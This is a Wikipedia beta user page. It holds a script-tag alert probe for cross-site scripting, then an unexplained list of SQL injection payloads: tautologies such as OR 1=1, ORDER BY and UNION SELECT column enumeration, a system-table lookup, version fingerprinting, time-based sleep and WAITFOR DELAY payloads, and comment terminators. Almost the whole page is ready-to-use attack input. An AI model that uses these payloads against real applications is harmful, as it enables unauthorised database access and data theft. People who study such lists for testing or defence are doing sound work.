User:V

From Wikipedia, the free encyclopedia

<script>alert("foo")</script>


' '' ` `` , " "" / // \ \\ ; ' or " -- or # ' OR '1 ' OR 1 -- - " OR "" = " " OR 1 = 1 -- - ' OR '' = ' '=' 'LIKE' '=0--+ OR 1=1 ' OR 'x'='x ' AND id IS NULL; -- ''''''''UNION SELECT '2 %00 /*…*/ + addition, concatenate (or space in url) || (double pipe) concatenate % wildcard attribute indicator

@variable local variable @@variable global variable


# Numeric AND 1 AND 0 AND true AND false 1-false 1-true 1*56 -2


1' ORDER BY 1--+ 1' ORDER BY 2--+ 1' ORDER BY 3--+

1' ORDER BY 1,2--+ 1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+ 1' GROUP BY 1,2,3--+ ' GROUP BY columnnames having 1=1 --


-1' UNION SELECT 1,2,3--+ ' UNION SELECT sum(columnname ) from tablename --


-1 UNION SELECT 1 INTO @,@ -1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --


Finding the table name


Time-Based: ,(select * from (select(sleep(10)))a) %2c(select%20*%20from%20(select(sleep(10)))a) ';WAITFOR DELAY '0:0:30'--

Comments:

# Hash comment /* C-style comment -- - SQL comment ;%00 Nullbyte ` Backtick

Retrieved from "https://en.wikipedia.beta.wmflabs.org/w/index.php?title=User:V&oldid=554858"